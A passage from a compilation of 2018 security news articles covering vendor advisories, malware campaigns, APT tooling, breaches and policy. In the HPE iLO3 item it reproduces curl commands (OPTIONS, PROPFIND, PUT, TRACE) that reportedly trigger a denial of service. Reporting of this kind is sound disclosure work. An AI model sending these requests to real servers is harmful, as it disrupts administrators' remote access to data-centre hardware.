“This post describes CVE-2017-8987, an unauthenticated remote Denial of Service vulnerability in HPE iLO3 firmware version 1.88. This vulnerability can be exploited by several HTTP methods; once triggered, it lasts for approximately 10 minutes until the watchdog service performs a restart of the iLO3 device. CVE-2017-8987 is categorized as CWE-400 (Resource Exhaustion) and has a CVSSv3 base score of 8.6.” states Rapid7.

Once an attacker has compromised a network he can lock out an admin to restore the operations causing severe problems to a data center.

“Several HTTP request methods cause iLO3 devices running firmware v1.88 to stop responding in several ways for 10 minutes:

SSH: open sessions will become unresponsive; new SSH sessions will not be established
Web portal: users cannot log in to the web portal; the login page will not successfully load
” continues Rapid 7.

HPE publicly disclosed the vulnerability on Feb. 22.

“A security vulnerability in HPE Integrated Lights-Out 3 (iLO 3) allows remote Denial of Service (DoS).” reads the security advisory published by HPE.

“HPE has provided the following instructions to resolve the vulnerability in HPE Integrated Lights-Out 3 (iLO 3) version 1.88: Please upgrade to HPE Integrated Lights-Out 3 (iLO 3) 1.89 which is available on HPE Support Center:

https://support.hpe.com/hpesc/public/home“

HPE said that affected version is v1.88 firmware for HPE Integrated Lights-Out 3 (iLO3), newer versions of the firmware (1.8, 1.82, 1.85, and 1.87) along with firmware for iLO4 (v2.55) are not impacted.

According to Rapid7 iLO5 devices were not tested, the experts also observed that requests calling the following four methods, will also trigger the Denial of Service:

curl -X OPTIONS hp-ilo-3.testing.your-org.com
curl -X PROPFIND hp-ilo-3.testing.your-org.com
curl -X PUT hp-ilo-3.testing.your-org.com
curl -X TRACE hp-ilo-3.testing.your-org.com

Below the disclosure timeline:

Sept 2017: Issue discovered
Thurs, Oct 19, 2017: Vendor released v1.89 update to iLO3, which addresses CVE-2017-8987
Mon, Nov 6, 2017: Vendor notified; vendor assigned PSRT110615 to this vulnerability
Wed, Nov 15, 2017: Additional details sent to vendor
Wed, Jan 10, 2018: Disclosed to CERT/CC
Wed, Jan 31, 2018: Vendor reported that v1.89 is not vulnerable to R7-2017-27; Rapid7 confirmed this finding.
Thurs, Feb 22, 2018: Public disclosure; vendor published security bulletin and assigned CVE-2017-8987
Thurs, Mar 1, 2018: Rapid7 published this post


Delta Patches Vulnerabilities in HMI, PLC Products
3.3.2018 securityweek
Vulnerebility

Taiwan-based Delta Electronics has patched several vulnerabilities in two of the company’s industrial automation products, including flaws that can be exploited for remote code execution.

A researcher who uses the online moniker “Axt” informed Delta via Trend Micro’s Zero Day Initiative (ZDI) and ICS-CERT that its WPLSoft product, a programming software for programmable logic controllers (PLCs), is affected by several types of vulnerabilities.

ICS-CERT’s advisory describes three types of flaws that can allow arbitrary code execution in the context of the current process or denial-of-service (DoS) attacks, specifically stack-based buffer overflow, heap-based buffer overflow, and out-of-bounds write issues. The security holes have been rated high severity and they are tracked as CVE-2018-7494, CVE-2018-7507 and CVE-2018-7509.

ZDI has published a total of nine advisories, one for each variation of these flaws. According to the company, the vulnerabilities are related to how the application parses .dvp files and they can be exploited by getting the targeted user to open a specially crafted file or webpage.

ZDI said it reported the security holes to Delta via ICS-CERT in February 2017. The company’s advisories suggest that the vendor attempted to release some patches last summer, but they did not properly fix the vulnerabilities. ZDI published its advisories in August 2017 with a “0Day” status.

ICS-CERT reported this week that the vulnerabilities were patched by Delta with the release of WPLSoft V2.46.0, which according to the vendor’s site was made available on February 2.

A separate advisory published this week by ICS-CERT describes a medium severity vulnerability found by researcher Ghirmay Desta in Delta’s DOPSoft human-machine interface (HMI) product.

The flaw, a stack-based buffer overflow, is related to the processing of .dop or .dpb files, and it can allow remote code execution. The issue affects DOPSoft 4.00.01 and prior, and it was patched with the release of version 4.00.04 on March 1.

This vulnerability was also reported to Delta via ZDI, but the company has yet to publish advisories. ZDI’s website shows a total of 17 upcoming advisories describing vulnerabilities found by Desta in the DOPSoft product in October 2017. Last year, the expert also found weaknesses in Delta’s PMSoft, a development tool for motion controllers.

ZDI was also recently informed by an anonymous researcher of four high severity flaws in an unnamed Delta product.

It’s not uncommon for ICS vendors to take hundreds of days to patch vulnerabilities. A report published last year by ZDI showed that the average patching time for SCADA flaws had been 150 days.


New Malware Used in Attacks Aimed at Inter-Korean Affairs

3.3.2018 securityweek Virus

A threat actor apparently interested in inter-Korean affairs continues to launch highly targeted attacks using new pieces of malware and decoy documents referencing North Korean political topics.

The cyber espionage group, which experts believe is sponsored by a nation state, has been active for several years, but it managed to stay under the radar until last year, when researchers analyzed two of its main tools, namely SYSCON and KONNI. These pieces of malware had been leveraged in attacks aimed at organizations linked to North Korea.

McAfee’s Advanced Threat Research team recently spotted a new campaign that appears to focus on North Korea, particularly humanitarian aid efforts. The security firm named this operation Honeybee based on the name of the user who created the malicious documents.

Previous research into this group’s activities and a new McAfee report claim the threat actor is likely a Korean speaker. In the past, some even suggested that the attacks may have been launched from South Korea.

However, McAfee told SecurityWeek that South Korea is most likely not behind the attacks. The security firm believes this is the work of an actor interested in inter-Korean affairs, specifically in English-language information.

The attack starts with a spear-phishing email carrying or linking to a malicious document. The document contains a macro designed to drop and execute a new version of the SYSCON backdoor. The malware allows attackers to upload files to a server, and download files to the compromised system and execute them.

The campaign appears to be mainly focused on North Korea, particularly humanitarian aid efforts, with primary targets located in Southeast Asia and the Americas. While many of the targeted entities are located in South Korea, some attacks are also aimed at users in Vietnam, Singapore, Japan, Indonesia, Canada and Argentina.

Some of the malicious documents used to deliver the malware reference North Korea – for example, one is named “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office.”

Other documents, however, rely on a different approach. They display fake Google Docs or Microsoft Office messages that instruct recipients to enable editing and content in order to access the information. If users comply, malicious code is executed and malware is downloaded to their device.

Decoy document used in North Korea attacks

Some of the droppers used in the Honeybee campaign are only disguised as documents. One dropper, tracked by McAfee as MaoCheng, has a document icon, but it’s actually an executable file signed with a stolen Adobe certificate. Once executed, MaoCheng opens a decoy document that instructs users to enable content in order to access the information.

McAfee said the MaoCheng dropper was likely created specifically for the Honeybee campaign and it has only been spotted two times. A new variant of the SYSCON backdoor was first seen by researchers on January 17, but the operation has relied on new implants since at least November 2017. Experts say many components are loosely based on previous versions of SYSCON, but they are unique from a code perspective.

“The attacks used simplistic malware, but the speed to put the campaign into production indicates that this is a well-organized group, hence it has the traits of a nation state level group,” Ryan Sherstobitoff, McAfee Senior Analyst of Major Campaigns


Nuance Estimates NotPetya Impact at $90 Million
3.3.2018 securityweek
Ransomware

Nuance Communications, one of the companies to have been impacted by the destructive NotPetya attack last year, estimates the financial cost of the attack at over $90 million.

Initially believed to be a ransomware outbreak, NotPetya hit organizations worldwide on June 27, and was found within days to be a destructive wiper instead. Linked to the Russia-linked BlackEnergy/KillDisk malware, NotPetya used a compromised M.E.Doc update server as infection vector.

NotPetya affected major organizations, including Rosneft, AP Moller-Maersk, Merck, FedEx, Mondelez International, Nuance Communications, Reckitt Benckiser, and Saint-Gobain, causing millions in damages to every one of them.

Last year, Nuance estimated that NotPetya impacted its revenue for the third quarter of 2017 by around $15 million, but the total financial losses the attack incurred are of around $100 million, the company now says.

In its latest 10-Q filing with the Securities and Exchange Commission (SEC), Nuance reveals that, for the fiscal year 2017, NotPetya caused losses of around $68.0 million in revenues, and incurred incremental costs of approximately $24.0 million as result of remediation and restoration efforts.

“NotPetya malware affected certain Nuance systems, including systems used by our healthcare customers, primarily for transcription services, as well as systems used by our imaging division to receive and process orders,” Nuance says. The company’s Healthcare segment was hit the most.

The company also notes that, while the direct effects of the attack were remediated during fiscal year 2017, the effects will continue to impact the company for the first quarter of fiscal year 2018 as well. The incident also determined the company to spend more on improving and upgrading information security, during fiscal year 2018 and beyond.

Last month, Danish shipping giant A.P. Moller–Maersk said it had to reinstall software on nearly 50,000 devices following the NotPetya assault. In September 2017, FedEx revealed a negative impact of around $300 million on its profit as result of the attack.

In mid-February 2018, the United Kingdom officially accused the Russian government of being responsible for the NotPetya attack. The next day, United States, Canada, Australia, and New Zealand joined the U.K. and also blamed Russia for the incident.


Biggest-Ever DDoS Attack (1.35 Tbs) Hits Github Website
2.3.2018 thehackernews
Attack

On Wednesday, February 28, 2018, GitHub's code hosting website hit with the largest-ever distributed denial of service (DDoS) attack that peaked at record 1.35 Tbps.
Interestingly, attackers did not use any botnet network, instead weaponized misconfigured Memcached servers to amplify the DDoS attack.
Earlier this week we published a report detailing how attackers could abuse Memcached, popular open-source and easily deployable distributed caching system, to launch over 51,000 times powerful DDoS attack than its original strength.
Dubbed Memcrashed, the amplification DDoS attack works by sending a forged request to the targeted Memcrashed server on port 11211 using a spoofed IP address that matches the victim's IP.
A few bytes of the request sent to the vulnerable server trigger tens of thousands of times bigger response against the targeted IP address.
"This attack was the largest attack seen to date by Akamai, more than twice the size of the September 2016 attacks that announced the Mirai botnet and possibly the largest DDoS attack publicly disclosed," said Akamai, a cloud computing company that helped Github to survive the attack.
In a post on its engineering blog, Github said, "The attack originated from over a thousand different autonomous systems (ASNs) across tens of thousands of unique endpoints. It was an amplification attack using the memcached-based approach described above that peaked at 1.35Tbps via 126.9 million packets per second."
Expect More Record-Breaking DDoS Attacks
Though amplification attacks are not new, this attack vector evolves thousands of misconfigured Memcached servers, many of which are still exposed on the Internet and could be exploited to launch potentially more massive attacks soon against other targets.
To prevent Memcached servers from being abused as reflectors, administrators should consider firewalling, blocking or rate-limiting UDP on source port 11211 or completely disable UDP support if not in use.


Windows Updates Deliver Intel's Spectre Microcode Patches
2.3.2018 securityweek 
Vulnerebility

Microsoft announced on Thursday that Windows users will receive the microcode updates released by Intel to patch the notorious Spectre vulnerability.

Meltdown and Spectre attacks allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to a flaw tracked as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be addressed with software updates, but Spectre Variant 2 requires microcode patches.

Microsoft has provided users the necessary software updates and it has now started delivering microcode patches as well.

After the first round of Spectre microcode patches from Intel caused more frequent reboots and other instability problems, the company started releasing new updates. The first patches were for Skylake, then for Kaby Lake and Coffee Lake, and this week for Haswell and Broadwell processors.

Intel has provided the microcode updates to device manufacturers, which are expected to make them available to customers once they have been tested.

For the time being, Microsoft will deliver Intel’s microcode updates to devices with 6th Generation Intel Core (Skylake) processors if they are running Windows 10 version 1709 (Fall Creators Update) or Windows Server version 1709 (Server Core).

“We will offer additional microcode updates from Intel as they become available to Microsoft. We will continue to work with chipset and device makers as they offer more vulnerability mitigations,” said John Cable, director of Program Management, Windows Servicing and Delivery.

When it started releasing software mitigations for Spectre and Meltdown, Microsoft warned that some users may not receive the updates due to antivirus compatibility issues. Cable said a vast majority of Windows devices now have compatible security products installed so they should not experience any problems in getting the patches.

“We will continue to require that an AV compatibility check is made before delivering the latest Windows security updates via Windows Update until we have a sufficient level of AV software compatibility,” Cable explained.

After news broke that Intel’s first round of microcode updates caused instability issues, Microsoft released an update that allowed Windows users to disable the problematic Spectre Variant 2 mitigation.


Cyberattack 'Ongoing' Against German Government Network

2.3.2018 securityweek  BigBrothers

The German government's IT network is under an "ongoing" cyberattack", the parliamentary committee on intelligence affairs said Thursday, without confirming a media report that Russian hackers were behind the assault.

"It is a real cyberattack on parts of the government system. It's an ongoing process, an ongoing attack," said Armin Schuster, chairman of the committee, adding that no further details could be given to avoid passing crucial information on to the attackers.

Interior Minister Thomas de Maiziere said the hacking was "a technically sophisticated attack that had been planned for some time", adding that it had been brought under control.

The highly professional assault had been monitored by the security agencies in order to gain insights into the mode of attack and its targets, said de Maiziere.

German news agency DPA, which first reported the attack the previous day, said Thursday, citing unnamed security sources, that the likely authors were the Russian cyber espionage group "Snake".

DPA had earlier pointed at the Russian hacker group APT28, which has been accused of attacks on Hillary Clinton's 2016 presidential campaign as well as on Germany's parliamentary IT system in 2015.

German security authorities had only detected the online spying in December, DPA has reported, adding that it had infiltrated the systems of the foreign and interior ministries. Konstantin von Notz, deputy of the committee, complained it was "completely unacceptable" that members of the oversight body only learnt of the attack through the media.

- Russian hackers -

Top security officials had repeatedly warned during Germany's 2017 general election campaign that Russian hackers may seek to influence or disrupt the polls.

While authorities did not have concrete proof, they have blamed the malware attack that crippled the Bundestag parliamentary network in 2015 for days on the APT28, also known as "Fancy Bear" or "Sofacy".

The attack netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them.

In a separate assault, several German political parties were in September 2016 sent fake emails purporting to be from NATO headquarters which contained a link that installed spying software on victims' computers.

The emails affected party operations such as a regional network of Chancellor Angela Merkel's Christian Democratic Union and the federal offices of the far-left Die Linke party.

Amid the rising frequency of attacks, Germany's defence ministry in 2016 set up a cyber department to coordinate the response to online intrusions.

Merkel, seeking to prepare the German public for more online attacks, has said people should "not allow themselves to be irritated" by such rogue operations.


Python-Written CannibalRAT Used in Targeted Attacks
2.3.2018 securityweek 
Virus

A newly identified remote access Trojan (RAT) that has been written entirely in Python is being used in highly targeted attacks, Cisco Talos researchers say.

Dubbed CannibalRAT, the malware lacks sophistication but exhibits signs of code cannibalization. At least two variants (versions 3.0 and 4.0) have been already used in attacks, both with the usual RAT capabilities, but the latter lacking features to fit a campaign targeting users of a Brazilian public sector management school.

The malicious activity associated with the RAT has increased after the second variant (4.0) emerged on February 5, 2018 (the first variant was spotted on Jan. 8). The newer iteration also uses obfuscation to avoid detection: it was packed with UPX and has a function to generate random strings in memory.

Both variants use base16 encoding scheme to obfuscate command and control (C&C) hostnames and data exchanged with the server. Also, both use the "CurrentVersion\Run" registry key for persistence, along with the service name "Java_Update", Cisco reveals.

Once executed on the infected machine, version 4.0 creates a PDF file with HTML code embedded, designed to load an image hosted at imgur.com, and launches Chrome to open the PDF.

Both versions connect to the same C&C infrastructure, but the older one uses standard web requests, while the newer version uses a REST-based API. The latter method would send username, hostname, and capability related information to the server as part of the initial request.

The credential-stealer modules are copied from the Radium-Keylogger’s source code (available on Github), while the VM detection function was copied from a different Github repository.

This, the researchers say, shows the large amount of code that adversaries share among them, which makes attribution even more difficult.

The malware’s modules have self-explanatory names: runcmd, persistence, download, upload, screenshot, miner, DDoS, driverfind, unzip, ehidden, credentials, file, zip, python, update, and vm. All are present in version 3.0, while version 4.0 lacks the distributed denial of service, miner, Python and update modules, as well as the ability to steal credentials from Firefox (it only works with Chrome).

The latest version also drops the module approach and includes all code in the main script. Furthermore, it includes four possible C&C hostnames (version 3.0 only had two), and randomly chooses one upon execution.

The attackers use the fast flux technique to hide the infrastructure and change name servers with high frequency (120 seconds), but the end points tend to be the same, belonging to a telecom provider in Brazil, the researchers say.

One of the domains associated with the campaign (the malware was hosted on it) is inesapconcurso.webredirect.org, apparently specifically created for these attacks. The actor used social engineering for the name as well: inesapconcurso is the aggregation of inesap and concurso, representing the school name and the Portuguese word for “competition”.

“While the objective of this campaign is unclear, the adversaries went through some work in order to keep their RAT as unnoticed as possible. Both the campaign target and the command-and-control visibility show this campaign is active in Brazil, which our DNS data confirms, reflecting the highly targeted approach of this campaign,” Cisco concludes.


Philips Working on Patches for 35 Flaws in Healthcare Product
2.3.2018 securityweek 
Vulnerebility

Philips has informed customers that it’s working on patches for dozens of vulnerabilities affecting the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.

According to Philips, versions 7.0.x and 8.0.x of the IntelliSpace Portal are affected by issues related to insecure Windows service permissions, legacy encryption, and remote desktop access functionality. A total of 35 CVE identifiers are associated with the vulnerabilities.

An advisory published by ICS-CERT describes the security holes as input validation flaws that allow remote code execution or denial-of-service (DoS) attacks, information exposure issues that allow unauthorized access to sensitive data, access control weaknesses that can be used for privilege escalation or code execution, local code execution and privilege escalation flaws, a code execution vulnerability that exists due to leftover debugging code, and multiple cryptographic issues. Serious vulnerabilities found in Philips IntelliSpace Portal

While some of these vulnerabilities appear to be specific to Philips’ product, many affect third-party components. For example, there are several remote code execution, information disclosure and DoS flaws related to Windows SMB, including the EternalBlue flaw exploited in the WannaCry ransomware attack.

Other flaws affect the Microsoft Remote Desktop Protocol (RDP) and Microsoft Office. The crypto-related weaknesses include POODLE, BEAST and other vulnerabilities disclosed in the past years, including one from 2004.

While exploits are publicly available for many of these vulnerabilities, they don’t specifically target Philips products, and the vendor claims it’s not aware of any attacks.

Philips will release patches in the coming months. The company says it’s also currently testing operating system updates, which cannot be installed without ensuring that they don’t impact the stability of the product. Until patches become available, customers have been provided a series of workarounds.

In January, Philips informed customers of an authentication issue affecting its IntelliSpace Cardiovascular (ISCV) cardiac image and information management system.

The company learned from a customer that when the ISCV system is used with an Electronic Medical Record (EMR) in Kiosk mode and configured with Windows authentication, users may not be properly logged out once they are done using the software.

The flaw allows a malicious actor that gains access to the system after it has been used by a legitimate EMR user to log in with that user’s credentials and obtain or modify sensitive information.

Philips said the security hole will be addressed with the release of version 3.1.0. In the meantime, users have been advised to close the browser after accessing the system. Changing the configuration so that Windows authentication is not used also addresses the problem.


Iran-Linked Chafer Group Expands Toolset, Targets List
2.3.2018 securityweek  APT
The Iran-based targeted attack group known as "Chafer" has been expanding its target list in the Middle East and beyond and adding new tools to its cyberweapon arsenal, Symantec warns.

Last year, the group engaged in a series of ambitious new attacks, hitting a major telecom companies in the Middle East and also attempting to attack a major international travel reservations firm. Active since at least July 2014 and already detailed a couple of years ago, Chafer is mainly focused on surveillance operations and the tracking of individuals.

During 2017, the group used seven new tools, rolled out new infrastructure, and hit nine new organizations in Israel, Jordan, the United Arab Emirates, Saudi Arabia, and Turkey. Targets included airlines, aircraft services, software and IT services firms serving the air and sea transport sectors, telecoms, payroll services, engineering consultancies, and document management software companies.

The group also targeted an African airline and attempted to compromise an international travel reservations firm, Symantec discovered.

Last year, Chafer compromised a telecoms services provider in the Middle East, a company that sells solutions to multiple telecom operators in the region. The compromise could have potentially allowed the attackers to carry out surveillance on a vast pool of end-users.

In attacks observed in 2015, the group was attacking the web servers of organizations, likely through SQL injection attacks. Last year, the group also started using malicious documents to drop malware, likely sent via spear-phishing emails to individuals working in targeted organizations.

Said documents were Excel spreadsheets carrying a malicious VBS file that would run a PowerShell script to execute a dropper on the compromised machine. In turn, the dropper would install an information stealer, a screen capture utility, and an empty executable.

The screen capture tool only had a role in the initial information gathering stage, the information stealer targeted the contents of the clipboard, took screenshots, recorded keystrokes, and stole files and user credentials. Next, the attackers would download additional tools onto the infected computer and attempted lateral movement on the victim’s network.

Recently, Chafer employed seven new tools in addition to the malware already associated with the group. Most of these tools, Symantec points out, are freely available, off-the-shelf tools that have been put to a malicious use.

These include Remcom, an open-source alternative to PsExec; Non-sucking Service Manager (NSSM), an open-source alternative to the Windows Service Manager; a custom screenshot and clipboard capture tool; SMB hacking tools, including the EternalBlue exploit; GNU HTTPTunnel, an open-source tool to create a bidirectional HTTP tunnel on Linux computers; UltraVNC, an open-source remote administration tool for Windows; and NBTScan, a free tool for scanning IP networks for NetBIOS name information.

Additionally, the group continued to use tools such as its own custom backdoor Remexi, PsExec, Mimikatz, Pwdump, and Plink.

Chafer apparently used the tools in concert to traverse targeted networks. NSSM was recently adopted for persistence and to install a service to run Plink, which opens reverse SSH sessions to presumably gain RDP access to the compromised computer. Next, PsExec, Remcom, and SMB hacking tools are leveraged for lateral movement.

The new infrastructure used in recent attacks included the domain win7-updates[.]com as a command and control (C&C) address, along with multiple IP addresses, though it’s unclear whether these were leased or hijacked. On a staging server apparently used by the attackers, the researchers found copies of many of the group’s tools.

According to Symantec, Chafer’s activities have some links to Oilrig, another Iran-based cyberespionage group. Both appear to be using the same IP address for C&C address, as well as a similar infection vector, an Excel document dropping a malicious VBS file referencing to the same misspelled file path.

While this could suggest that the two groups are one and the same, there isn’t enough evidence to support that hypothesis, Symantec says. More likely, the “two groups are known to each other and enjoy access to a shared pool of resources,” the researchers suggest.

Chafer’s recent activities show not only that the group remains highly active, but also that it has become more audacious in its choice of targets. Similar to other targeted attack groups, it has been relying on freely available software tools for malicious activities, and also moved to supply chain attacks, which are more time consuming and more likely to be discovered.

“These attacks are riskier but come with a potentially higher reward and, if successful, could give the attackers access to a vast pool of potential targets,” Symantec concludes.


Equifax Identifies 2.4 Million More Affected by Massive Hack
2.3.2018 securityweek  Hacking

US credit bureau Equifax said Thursday it identified an additional 2.4 million American consumers affected by last year's massive data breach that sparked a public outcry and a congressional probe.

The company's forensic investigation revealed the new identities on top of the 146 million affected in the attack that exposed victims' personal details, including names, birth dates and social security numbers.

"This is not about newly discovered stolen data," said Paulino do Rego Barros, who took over as interim chief executive last year at the scandal-hit credit agency.

"It's about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals."

Equifax said the newly identified consumers were not previously informed because their social security numbers -- which appeared to be the focus of the hackers -- were not stolen together with their partial driver's license information.

Equifax said it would notify these consumers and will offer identity theft protection and credit file monitoring services.

The Atlanta-based company, which tracks consumer financial data to help establish credit ratings, is now facing state and federal investigations as well as class-action lawsuits over the breach.

While the breach was not the largest in history, it has been considered among the most damaging because of the sensitive information held by Equifax and the potential for that data to be used in identity theft or other crimes.


CannibalRAT, a RAT entirely written in Python observed in targeted attacks
2.3.2018 securityaffairs
Virus

Security researchers from Cisco Talos discovered a new remote access Trojan (RAT) dubbed CannibalRAT that has been written entirely in Python.
The CannibalRAT RAT is being used in highly targeted attacks. the experts explained that even if it isn’t very sophisticated it exhibits signs of code cannibalisation from other open-source projects.

“The RAT itself is not very sophisticated, and exhibits signs of code cannibalisation from other open-source projects, which contrasts with the command-and-control, using fast flux to keep hidden, even if the endpoints are not very diversified.” reads the analysis published by Talos.

The researchers observed the involvement of at least two variants (versions 3.0 and 4.0) in targeted attacks.

cannibalrat activity

The two samples were written using Python and packed into an executable using the popular tool py2exe.

According to the researchers, the version 4.0 is a stripped-down version, this means that vxers removed from the main code some features, anyway authors have attempted to add obfuscation techniques in order to avoid detection.

The version 4.0 includes a function that will generate random strings in memory in the attempt to make memory string analysis harder.
“The malware main script bytecode is stored in a portable executable (PE) section called PYTHONSCRIPT, while the Python DLL is stored in a section called PYTHON27.DLL. All the remaining modules’ bytecode is compressed and stored in the executable overlay.” continues the analysis.

The first variant of the malware was spotted on Jan. 8, anyway, Cisco Talos observed a significant increase in the activities of the CannibalRAT after the variant 4.0 appeared in the wild on February 5, 2018

Both variants use base16 encoding scheme to obfuscate command and control (C&C) hostnames and data exchanged with the server, they gain persistence by using “CurrentVersion\Run” registry key with the service name “Java_Update“,

Once executed, the CannibalRAT version 4.0 creates a PDF file with HTML code embedded that loads an image hosted at imgur.com and launches Chrome to open the PDF.

The two versions share the same C&C servers, but while the variant 3.0 uses standard web requests, the newer version uses a REST-based API.

“The command-and-control infrastructure attempts to use the fast flux technique to hide, although the name servers are changing with high frequency, and the end points tend to be the same, all belonging to a telecom provider in Brazil with the autonomous system number AS 7738 and shared among all four command-and-control hostnames.” states Cisco Talos.

CannibalRAT borrows the credential-stealer modules form the Radium-Keylogger, which has the source code published on Github, the experts also noticed that the VM detection feature was copied from a different Github repository.

“The malware’s modules have self-explanatory names: runcmd, persistence, download, upload, screenshot, miner, DDoS, driverfind, unzip, ehidden, credentials, file, zip, python, update, and vm.” continues the analysis.”All are present in version 3.0, while version 4.0 lacks the distributed denial of service, miner, Python and update modules, as well as the ability to steal credentials from Firefox (it only works with Chrome).”

Experts noticed that the version 4.0 doesn’t use modules, instead, all the code is included in the main script. Furthermore.

Talos team provided details of a campaign involving the CannibalRAT Version targeting the INESAP, a Brazilian school for public administration

The campaign is highly targeted at this specific geographic region, attackers targeted only Chrome users.

“the RAT was hosted at inesapconcurso.webredirect.org and filebin.net, while the second domain is a popular file-sharing platform, the first domain was clearly created as part of the campaign.” continues the analysis.

“The subdomain inesapconcurso is the aggregation of two words; inesap and concurso. The first word is the school name, the second can be translated into competition, this is part of the social engineering of this campaign, as this Institute helps the management the application of workers to public sector vacancies.”
Further info about the malware including IoCs are reported in the analysis.


European Commission requests IT firms to remove ‘Terror Content’ within an hour
2.3.2018 securityaffairs Cyber

The UE issued new recommendations to tackle illegal content online, it asked internet companies to promptly remove terror content from their platforms within an hour from notification.
On Thursday, the UE issued new recommendations to internet companies to promptly remove “harmful content,” including terror content, from their platforms.

“As a follow-up, the Commission is today recommending a set of operational measures accompanied by the necessary safeguards – to be taken by companies and Member States to further step up this work before it determines whether it will be necessary to propose legislation.” reads the fact sheet published by the European Commission.

“These recommendations apply to all forms of illegal content ranging from terrorist content, incitement to hatred and violence, child sexual abuse material, counterfeit products and copyright infringement.”

It is a call to action for the tech firms and social media giants to take down “terrorist content” within an hour of it being reported, the recommendation is directed to major services including YouTube, Facebook, and Twitter.

These platforms are daily abused by terrorist organizations like Islamic State group, the EU’s recommendations follow the demands of the nations participant at the 2017 G7 Summit held in Taormina, Italy, that urged action from internet service providers and social media giants against extremist content online.

terror content

The European Commission is teaming up with a group of US internet giants to adopt additional measures to fight web extremism, but at the same time, it warned it would adopt consider legislation if the Internet firms will not follow the recommendations.

“While several platforms have been removing more illegal content than ever before — showing that self-regulation can work — we still need to react faster against terrorist propaganda and other illegal content,” said the commission’s vice-president for the Digital Single Market Andrus Ansip.

“This content remains “a serious threat to our citizens’ security, safety, and fundamental rights,”


Andrus Ansip

@Ansip_EU
What is illegal offline is also illegal online. Limited liability system under EU's #eCommerce law already works well – it should stay in place. My statement at press conference on fighting illegal content online: http://bit.ly/2oJGgTw

1:07 PM - Mar 1, 2018
11
See Andrus Ansip's other Tweets
Twitter Ads info and privacy
The European Commission recognized the results achieved by internet firms in combatting illegal content, but the adversaries are very active and there is still a lot of work to do.

“significant scope for more effective action, particularly on the most urgent issue of terrorist content, which presents serious security risks”.

The European Commission pretends that terrorist content should be taken down within one hour of being reported by the authorities, it also urges more strictly monitoring and proactive actions against the illegal content.

The EU suggests the adoption of automated detection systems that could support tech firms to rapidly identify harmful content and any attempt to re-upload removed illegal content.

The new recommendations specifically address also other types of harmful illegal content such as hate speech and images of child sexual abuse.

“Illegal content means any information which is not in compliance with EU law or the law of a Member State. This includes terrorist content, child sexual abuse material (Directive on combating sexual abuse of children), illegal hate speech (Framework
Decision on combating certain forms and expressions of racism and xenophobia by means of criminal law), commercial scams and frauds (such as Unfair commercial practices directive or Consumer rights directive) or breaches of intellectual property rights (such as Directive on the harmonisation of certain aspects of copyright and related rights in the information society).” continues the EC.
“Terrorist content is any material which amounts to terrorist offences under the EU Directive on combating terrorism or under national laws — including material produced by, or attributable to, EU or UN listed terrorist organisations.”

According to the commission, internet firms removed 70 percent of illegal content notified to them in the preceding few months.


Apple Moves iCloud Data and Encryption Keys for Chinese Users to China
2.3.2018 thehackernews Apple

Apple has finally agreed to open a new Chinese data center next month to comply with the country's latest controversial data protection law.
Apple will now move the cryptographic keys of its Chinese iCloud users in data centers run by a state-owned company called Cloud Big Data Industrial Development Co, despite concerns from human rights activists.
In 2017, China passed a Cybersecurity Law that requires "critical information infrastructure operators" to store Chinese users' data within the country's borders, which likely forced Apple to partner with the new Chinese data center.
And the icing on the cake is that Chinese government already has legislation called National Security Law, passed in 2015, which gives police the authority to demand companies help them bypass encryption or other security tools to access personal data.
This is the first time when Apple is going to store encryption keys required to unlock iCloud accounts of its users outside the United States.
In theory, Chinese law enforcement agencies won't have to ask US courts for compelling Apple to give them access to the Chinese users’ data.
Instead, they'll simply use their legal system to demand access to cryptographic keys required to unlock iCloud accounts stored within their nation, making it far easier to access users’ data, such as messages, emails, and photos.
However, Apple has said the company alone would have access to the iCloud encryption keys and that Chinese authorities will have no backdoor into its data troves.
Apple said the company had not given any of its customers account information to Chinese authorities despite receiving 176 requests from 2013 to 2017, Reuters reported, though all requests were made before the new cybersecurity laws took effect.
If Apple thinks it would comply with one law, i.e., storing users data in China, but could stand without complying with other stringent Chinese regulations, then the company should reconsider its decision.
The company has severely been implementing various aspects of Chinese laws in recent months for its regional operations in the most populated country.
Last year, Apple controversially removed VPN apps from its official App Store in China to comply with Chinese cyberspace regulations, making it harder for internet users to bypass its Great Firewall.
Earlier last year, Apple removed the New York Times (NYT) app from its Chinese App Store because the app was in "violation of local regulations."


A Simple Bug Revealed Admins of Facebook Pages — Find Out How

2.3.2018 thehackernews Social

Facebook Page admins are publicly displayed only if admins have chosen to feature their profiles.
However, there are some situations where you might want to contact a Facebook page admin or want to find out who is the owner of a Facebook page.
Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have allowed anyone to expose Facebook page administrator profiles, which is otherwise not supposed to be public information.
Baset claimed to have discovered the vulnerability in less than 3 minutes without any kind of testing or proof of concepts, or any other type of time-consuming processes.

In a blog post, Baset said he found the vulnerability, which he described as a "logical error," after receiving an invitation to like a particular Facebook page on which he had previously liked a post.
Facebook has introduced a feature for page admins wherein they can send Facebook invitations to users asking them if they wished to like their page after liking a post, and a few days later, these interacted users may receive an email reminding them of the invitation.
After Baset received one such email invite, he simply opened "show original" drop-down menu option in email. Looking at the email's source code, he noticed that it included the page administrator's name, admin ID and other details.
The researcher then immediately reported the issue to the Facebook Security Team through its Bugcrowd bug bounty program. The company acknowledged the bug and awarded Baset $2,500 for his findings.
Though Facebook has now patched this information disclosure issue, people who have already received one such page invitation can still find out admin details from the invitation emails.
"We were able to verify that under some circumstances page invitations sent to non-friends would inadvertently reveal the name of the page admin which sent them," Facebook said. "We've address the root cause here, and future emails will not contain that information."
Facebook has now patched this information disclosure issue.


Bugcrowd Raises $26 Million to Expand Vulnerability Hunting Business
2.3.2018 securityweek 
Vulnerebility

Crowdsourced security testing company Bugcrowd announced today that it has closed $26 million in a Series C funding round led by Triangle Peak Partners.

The new funding brings the total amount raised by the company to $50 million, including $15 million raised in a Series B funding round in 2016.

The company’s flagship “Crowdcontrol” offering is software-as-a-service platform that allows organizations run their own customized bug bounty programs to uncover and resolve security vulnerabilities in their products.

The new funding will be used to support product innovation and program management, the company said.

